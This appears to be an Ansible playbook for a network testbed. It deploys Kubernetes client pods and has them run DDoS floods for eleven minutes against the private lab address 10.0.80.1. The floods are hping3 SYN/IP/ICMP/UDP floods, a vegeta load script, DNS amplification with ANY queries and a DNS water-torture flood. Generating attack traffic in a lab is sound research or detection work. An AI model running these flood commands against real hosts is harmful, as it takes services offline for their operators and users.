---
- name: Execute generators
  hosts: localhost
  gather_facts: no

  tasks:
#---------------------------------clients-deployment---------------------------------------------------------------------------------------
    - name: deploy
      shell: microk8s kubectl apply -f /home/edge/NDT-EDGE/Edge/tn-clients-deployment/clients-conf/ -n default
      async: 3600
      poll: 0

    - name: Wait for 10 seconds
      pause:
        seconds: 10

    - name: Wait until all pods are ready
      shell: |
        total=$(microk8s kubectl get pods -n default --no-headers 2>/dev/null | wc -l)
        ready=$(microk8s kubectl get pods -n default --no-headers 2>/dev/null | grep -cE '^[^ ]+\s+([0-9]+)/\1\s+Running')
        if [ "$total" -eq 0 ]; then
          echo 1  # No pods yet
        elif [ "$total" -eq "$ready" ]; then
          echo 0  # All pods are Ready
        else
          echo 1  # Still waiting for pods to be Ready
        fi
      register: all_pods_ready
      until: all_pods_ready.stdout == "0"
      retries: 120
      delay: 10


#---------------------------------clients-config---------------------------------------------------------------------------------------

    - name: Configure resolv.conf in clients 1 to 7
      shell: microk8s kubectl exec -n default client{{ item }} -- /bin/bash -c 'echo -e "nameserver 10.0.80.1\noptions edns0" > /etc/resolv.conf'
      loop: "{{ range(1, 8) | list }}"
      ignore_errors: yes

#---------------------------------------export variables----------------------------------------------------------------------------------------------
        
    - name: Generate custom .bashrc 
      shell: microk8s kubectl exec -n default client{{ item }} -- /bin/bash -c 'echo "export ddosserver=10.0.80.1" >> /root/.bashrc'
      loop: "{{ range(1, 8) | list }}"
      ignore_errors: yes

    - name: Source.bashrc 
      shell: microk8s kubectl exec -n default client{{ item }} -- /bin/bash -c 'source /root/.bashrc'
      loop: "{{ range(1, 8) | list }}"
      ignore_errors: yes

#---------------------------------Tasks execution---------------------------------------------------------------------------------------
    - name: Execute hping TCP
      shell: microk8s kubectl exec -n default client1 -- env ddosserver=10.0.80.1 /bin/bash -c 'sudo timeout 660 hping3 -d 1200 -S 10.0.80.1 -p 43 --flood'
      async: 3600 
      poll: 0

    - name: Execute hping IP
      shell: microk8s kubectl exec -n default client2 -- env ddosserver=10.0.80.1 /bin/bash -c 'sudo timeout 660 hping3 -0 -d 1200 -S 10.0.80.1 --flood'
      async: 3600 
      poll: 0

    - name: Execute hping ICMP
      shell: microk8s kubectl exec -n default client3 -- env ddosserver=10.0.80.1 /bin/bash -c 'sudo timeout 660 hping3 -1 -d 1200 -S 10.0.80.1 --flood'
      async: 3600 
      poll: 0

    - name: Execute hping UDP
      shell: microk8s kubectl exec -n default client4 -- env ddosserver=10.0.80.1 /bin/bash -c 'sudo timeout 660 hping3 -2 -d 1200 -S 10.0.80.1 -p 80 --flood'
      async: 3600 
      poll: 0

    - name: Execute vegeta.sh
      shell: microk8s kubectl exec -n default client5 -- env ddosserver=10.0.80.1 ./vegeta.sh 660
      async: 3600 
      poll: 0

    - name: Execute dns-amp
      shell: microk8s kubectl exec -n default client6 -- env ddosserver=10.0.80.1 /bin/bash -c './dns_amp/dns-amp 10.0.80.1 -f domain.txt -t ANY -p 53 -S -d 660'
      async: 3600 
      poll: 0

    - name: Execute watertorture
      shell: microk8s kubectl exec -n default client7 -- env ddosserver=10.0.80.1 /bin/bash -c './dns-flood/dnsflood example.com 10.0.80.1 -p 53 -R -S -d 660'
      async: 3600 
      poll: 0


    - name: Wait for 660 seconds
      pause:
        seconds: 660


#---------------------------------clients-undeployment---------------------------------------------------------------------------------------

    - name: delete
      shell: microk8s kubectl delete -f /home/edge/NDT-EDGE/Edge/tn-clients-deployment/clients-conf/ -n default
      async: 3600
      poll: 0
